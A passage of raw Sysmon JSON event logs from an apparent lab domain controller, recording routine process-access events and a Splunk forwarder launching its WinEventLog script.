\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3620,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3621,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3622,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3623,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3624,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010D48E0500}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010D48E0500}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3625,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.300\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-00107D900500}\r\nProcessId: 3588\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.300","ProcessGuid":"{41C8662E-1FF7-5F25-0000-00107D900500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinEventLog.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3626,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-00107D900500}\r\nTargetProcessId: 3588\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-00107D900500}","TargetProcessId":"3588","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3627,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-00107D900500}\r\nTargetProcessId: 3588\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.298","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-00107D900500}","TargetProcessId":"3588","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3628,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.298\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 